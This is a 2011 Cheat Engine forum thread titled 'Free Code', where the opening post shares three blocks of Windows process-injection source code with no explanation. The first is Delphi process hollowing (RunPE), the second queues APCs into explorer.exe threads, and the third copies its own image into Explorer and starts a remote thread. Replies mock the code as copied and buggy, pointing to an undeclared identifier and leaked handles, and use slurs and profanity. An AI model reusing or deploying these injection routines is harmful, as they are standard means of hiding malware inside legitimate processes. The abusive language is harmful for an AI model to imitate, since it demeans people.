Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


Free Code

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam
View previous topic :: View next topic  
Author Message
DeletedUser14087
I post too much
Reputation: 2

Joined: 21 Jun 2006
Posts: 3069
PostPosted: Sat Jun 04, 2011 2:41 pm    Post subject: Free Code Reply with quote
Code:
uses  Windows,  ShellApi; type    TSections = array [0..0] of TImageSectionHeader; function GetAlignedSize(Size: dword; Alignment: dword): dword;begin  if ((Size mod Alignment) = 0) then  begin    Result := Size;  end  else  begin    Result := ((Size div Alignment) + 1) * Alignment;  end;end; function ImageSize(Image: pointer): dword;var  Alignment: dword;  ImageNtHeaders: PImageNtHeaders;  PSections: ^TSections;  SectionLoop: dword;begin  ImageNtHeaders := pointer(dword(dword(Image)) + dword(PImageDosHeader(Image)._lfanew));  Alignment := ImageNtHeaders.OptionalHeader.SectionAlignment;  if ((ImageNtHeaders.OptionalHeader.SizeOfHeaders mod Alignment) = 0) then  begin    Result := ImageNtHeaders.OptionalHeader.SizeOfHeaders;  end  else  begin    Result := ((ImageNtHeaders.OptionalHeader.SizeOfHeaders div Alignment) + 1) * Alignment;  end;  PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);  for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do  begin    if PSections[SectionLoop].Misc.VirtualSize <> 0 then    begin      if ((PSections[SectionLoop].Misc.VirtualSize mod Alignment) = 0) then      begin        Result := Result + PSections[SectionLoop].Misc.VirtualSize;      end      else      begin        Result := Result + (((PSections[SectionLoop].Misc.VirtualSize div Alignment) + 1) * Alignment);      end;    end;  end;end; procedure CreateProcessEx(FileMemory: pointer);var  BaseAddress, Bytes, HeaderSize, InjectSize,  SectionLoop, SectionSize: dword;  Context: TContext;  FileData: pointer;  ImageNtHeaders: PImageNtHeaders;  InjectMemory: pointer;  ProcInfo: TProcessInformation;  PSections: ^TSections;  StartInfo: TStartupInfo;begin  ImageNtHeaders := pointer(dword(dword(FileMemory)) + dword(PImageDosHeader(FileMemory)._lfanew));  InjectSize := ImageSize(FileMemory);  GetMem(InjectMemory, InjectSize);  try    FileData := InjectMemory;    HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;    PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);    for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do    begin      if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;    end;    CopyMemory(FileData, FileMemory, HeaderSize);    FileData := pointer(dword(FileData) + GetAlignedSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders, ImageNtHeaders.OptionalHeader.SectionAlignment));    for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do    begin      if PSections[SectionLoop].SizeOfRawData > 0 then      begin        SectionSize := PSections[SectionLoop].SizeOfRawData;        if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;        CopyMemory(FileData, pointer(dword(FileMemory) + PSections[SectionLoop].PointerToRawData), SectionSize);        FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));      end      else      begin        if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + GetAlignedSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));      end;    end;    ZeroMemory(@StartInfo, SizeOf(StartupInfo));    ZeroMemory(@Context, SizeOf(TContext));    CreateProcess(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);    Context.ContextFlags := CONTEXT_FULL;    GetThreadContext(ProcInfo.hThread, Context);    ReadProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);    VirtualAllocEx(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);    WriteProcessMemory(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);    WriteProcessMemory(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);    Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;    SetThreadContext(ProcInfo.hThread, Context);    ResumeThread(ProcInfo.hThread);  finally    FreeMemory(InjectMemory);  end;end;




Code:
#include <windows.h>
 
 
 
 
typedef long NTSTATUS;
 
 
typedef NTSTATUS (WINAPI *NtQAT)(HANDLE, DWORD, unsigned char *, ULONG, ULONG);
 
 
 
 
 
 
 
typedef struct _threads_s
{
   DWORD            tid;
   struct _threads_s   *next;
} threads_s;
 
unsigned char *FindERNEL32Address(unsigned char *base)
{
   unsigned char   *p;
   BOOL         found = FALSE;
 
   p = base;
 
   while (!found)
   {
      if ((unsigned int)p == 0xFFFFFFFF)
         return NULL;
 
      while (memcmp(p, ERNEL32_LOW, sizeof(ERNEL32_LOW) - 1) &&
         memcmp(p, ERNEL32_HIGH, sizeof(ERNEL32_HIGH) - 1))
         p++;
 
      if (!memcmp(p + sizeof(ERNEL32_LOW) - 1, DLL_LOW, sizeof(DLL_LOW) - 1) ||
         !memcmp(p + sizeof(ERNEL32_HIGH) - 1, DLL_HIGH, sizeof(DLL_HIGH) - 1))
         found = TRUE;
      else
         p++;
   }
 
   return p;
}
 
unsigned char *GetERNEL32Address(DWORD *llexa)
{
   HMODULE         kernel32;
   unsigned char   *ernel32;
 
   kernel32 = LoadLibraryA("kernel32.dll");
   if (!kernel32)
   {
      printf("Failed to load kernel32.dll");
      return NULL;
   }
 
   *llexa = (DWORD)GetProcAddress(kernel32, "LoadLibraryExA");
 
   ernel32 = FindERNEL32Address((unsigned char *)kernel32);
   if (!ernel32)
   {
      printf("Failed to find ernel32.dll string");
      return NULL;
   }
 
   printf("ernel32.dll string found at offset: %08X\n", ernel32);
 
   FreeLibrary(kernel32);
 
   return ernel32;
}
 
DWORD GetExplorerID()
{
   HANDLE         hprocess;
   PROCESSENTRY32   pe32 = {0};
 
   if ((hprocess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE)
   {
      pe32.dwSize = sizeof(PROCESSENTRY32);
      if (Process32First(hprocess, &pe32))
      {
         do
         {
            if (!lstrcmpiA(pe32.szExeFile, EXPLORER))
            {
               printf("Explorer.exe process id: %d\n", pe32.th32ProcessID);
               CloseHandle(hprocess);
               return pe32.th32ProcessID;
            }
         } while (Process32Next(hprocess, &pe32));
      }   
   }
 
   printf("Failed to find explorer.exe process id.");
   CloseHandle(hprocess);
   return 0;
}
 
threads_s *GetExplorerThreads(DWORD pid)
{
   HANDLE         hthread;
   THREADENTRY32   th32 = {0};
   threads_s      *threads = NULL;
 
   if ((hthread = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0)) != INVALID_HANDLE_VALUE)
   {
      th32.dwSize = sizeof(THREADENTRY32);
      if (Thread32First(hthread, &th32))
      {
         do
         {
            if (th32.th32OwnerProcessID == pid)
            {
               threads_s   *n = (threads_s *)malloc(sizeof(threads_s));
               if (n == NULL)
               {
                  printf("Error allocating memory");
                  return NULL;
               }
 
               n->next = threads;
               threads = n;
 
               threads->tid = th32.th32ThreadID;
 
               printf("Saved explorer.exe thread, id: %d\n", th32.th32ThreadID);
 
            }
         } while (Thread32Next(hthread, &th32));
      }
   }
 
   CloseHandle(hthread);
   return threads;
}
 
int main()
{
   unsigned char   *ernel32;
   DWORD         pid;
   threads_s      *threads;
   HMODULE         ntdll;
   NtQAT         NtQueueApcThread;
   HANDLE         hthread;
   DWORD         llexa;
 
   if ((ernel32 = GetERNEL32Address(&llexa)) == NULL)
      return 0;
   
   if ((pid = GetExplorerID()) == 0)
      return 0;
 
   threads = GetExplorerThreads(pid);
 
   ntdll = LoadLibraryA("ntdll.dll");
   if (!ntdll)
   {
      printf("Failed to load ntdll.dll");
      return 0;
   }
 
   NtQueueApcThread = (NtQAT)GetProcAddress(ntdll, "NtQueueApcThread");
   if (!NtQueueApcThread)
   {
      printf("Failed to get address of NtQueueApcThread function");
      return 0;
   }
   else
      printf("NtQueueApcThread address is: %08X\n", NtQueueApcThread);
 
   printf("LoadLibraryEx address: %08X\n", llexa);
 
   while (threads != NULL)
   {
      printf("Trying thread: %d\n", threads->tid);
      hthread = OpenThread(THREAD_ALL_ACCESS, FALSE, threads->tid);
      if (hthread == 0)
      {
         printf("Failed to open thread: %d", GetLastError());
         return 0;
      }
 
      NtQueueApcThread(hthread, llexa, ernel32, 0, 0);
      CloseHandle(hthread);
      Sleep(1000);
      threads = threads->next;
   }
   
   FreeLibrary(ntdll);
 
   return 0;
}
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
#include <windows.h>
#include <stdio.h>
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
 
BOOL Inject(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);
BOOL PerformRebase(LPVOID lpAddress, DWORD dwNewBase);
DWORD WINAPI RemoteThread(LPVOID lpParam);
 
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
   HWND hWnd;
   DWORD dwPid;
 
   hWnd = FindWindow("Progman", NULL);
 
   GetWindowThreadProcessId(hWnd, &dwPid);
 
   Inject(dwPid, (LPTHREAD_START_ROUTINE)RemoteThread, NULL);
   return 0;
}
DWORD WINAPI RemoteThread(LPVOID lpParam)
{
   char filename[MAX_PATH], msg[MAX_PATH];
   GetModuleFileName(GetModuleHandle(NULL), filename, MAX_PATH);
   sprintf(msg, "I am now inside of the remote process: %s\n", filename);
   MessageBox(0, msg, "", MB_OK);
   ExitThread(0);
   return 0;
}
 
BOOL Inject(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
{
   HMODULE hModule, hNewModule;
   DWORD dwSize;
   HANDLE hProcess;
 
   PIMAGE_DOS_HEADER pDH;
   PIMAGE_NT_HEADERS pPE;
 
   if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid)) == NULL)
      return FALSE;
 
   hModule = GetModuleHandle(NULL);
 
   pDH = (PIMAGE_DOS_HEADER)hModule;
   pPE = (PIMAGE_NT_HEADERS) ((LPSTR)pDH + pDH->e_lfanew);
 
   dwSize = pPE->OptionalHeader.SizeOfImage;
 
   LPVOID lpNewAddr = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
   if (lpNewAddr == NULL)
      return FALSE;
 
   CopyMemory(lpNewAddr, hModule, dwSize);
 
   hNewModule = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   if (hNewModule == NULL)
      return FALSE;
 
   PerformRebase(lpNewAddr, (DWORD)hNewModule);
 
   if (WriteProcessMemory(hProcess, hNewModule, lpNewAddr, dwSize, NULL) == 0)
      return FALSE;
 
   DWORD dwThread = (DWORD)lpStartProc - (DWORD)hModule + (DWORD)hNewModule;
 
   if (CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)dwThread, lpParam, 0, NULL) == NULL)
      return FALSE;
 
   return TRUE;
}
 
BOOL PerformRebase(LPVOID lpAddress, DWORD dwNewBase)
{
   PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)lpAddress;
 
   if (pDH->e_magic != IMAGE_DOS_SIGNATURE)
      return FALSE;
 
   PIMAGE_NT_HEADERS pPE = (PIMAGE_NT_HEADERS) ((char *)pDH + pDH->e_lfanew);
 
   if (pPE->Signature != IMAGE_NT_SIGNATURE)
      return FALSE;
 
   DWORD dwDelta = dwNewBase - pPE->OptionalHeader.ImageBase;
 
   DWORD dwVa = pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
   DWORD dwCb = pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
 
   PIMAGE_BASE_RELOCATION pBR = MakePtr(PIMAGE_BASE_RELOCATION, lpAddress, dwVa);
 
   UINT c = 0;
   while (c < dwCb)
   {
      c += pBR->SizeOfBlock;
      int RelocCount = (pBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
      LPVOID lpvBase = MakePtr(LPVOID, lpAddress, pBR->VirtualAddress);
      WORD *areloc = MakePtr(LPWORD, pBR, sizeof(IMAGE_BASE_RELOCATION));
 
      for (int i = 0; i < RelocCount; i++)
      {
         int type = areloc[i] >> 12;
         if (type == 0)
            continue;
         if (type != 3)
            return FALSE;
 
         int ofs = areloc[i] & 0x0fff;
 
         DWORD *pReloc = MakePtr(DWORD *, lpvBase, ofs);
         if (*pReloc - pPE->OptionalHeader.ImageBase > pPE->OptionalHeader.SizeOfImage)
            return FALSE;
 
         *pReloc += dwDelta;
      }
      pBR = MakePtr(PIMAGE_BASE_RELOCATION, pBR, pBR->SizeOfBlock);
   }
   pPE->OptionalHeader.ImageBase = dwNewBase;
 
   return TRUE;
}
Back to top
View user's profile Send private message
Slugsnack
Grandmaster Cheater Supreme
Reputation: 71

Joined: 24 Jan 2007
Posts: 1857
PostPosted: Sat Jun 04, 2011 3:13 pm    Post subject: Reply with quote
hey shitbrick. use windows' native character encoding, wchar. or better yet, tchar. and nigplz. sprintf and its associates are deprecated. _s plz, k ? and uhhh not closing handles ? memory leaks are pretty old school noobshit right there son. good job using an undeclared identifier ERNEL32_LOW as well.

that's after looking for half a minute. don't post up any more of your crap, shitfuck

Last edited by Slugsnack on Sat Jun 04, 2011 3:16 pm; edited 1 time in total
Back to top
View user's profile Send private message
Evil_Intentions
Expert Cheater
Reputation: 65

Joined: 07 Jan 2010
Posts: 214
PostPosted: Sat Jun 04, 2011 3:15 pm    Post subject: Reply with quote
Slugsnack wrote:
hey shitbrick. use windows' native character encoding, wchar. or better yet, tchar. and nigplz. sprintf and its associates are deprecated. _s plz, k ? and uhhh not closing handles ? memory leaks are pretty old school noobshit right there son.

that's after looking for half a minute. don't post up any more of your crap, shitfuck


Calm down, I'm sure he just copied from some "LULZ WE R B14CKH4T" forum.
Back to top
View user's profile Send private message
Slugsnack
Grandmaster Cheater Supreme
Reputation: 71

Joined: 24 Jan 2007
Posts: 1857
PostPosted: Sat Jun 04, 2011 3:17 pm    Post subject: Reply with quote
it's funny how he fucked off for several days to hand-select what he deemed to be the best piece of code there and managed to come back with this. noobs learning from noobs
Back to top
View user's profile Send private message
AverageAzn247
Grandmaster Cheater
Reputation: 34

Joined: 01 Oct 2007
Posts: 909
Location: Austin,TX with 72 virgins
PostPosted: Sat Jun 04, 2011 3:26 pm    Post subject: Reply with quote
obvs meme is obvs
_________________


Waxxup wrote:
What are Night Elves?
A girl group?
Back to top
View user's profile Send private message MSN Messenger
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites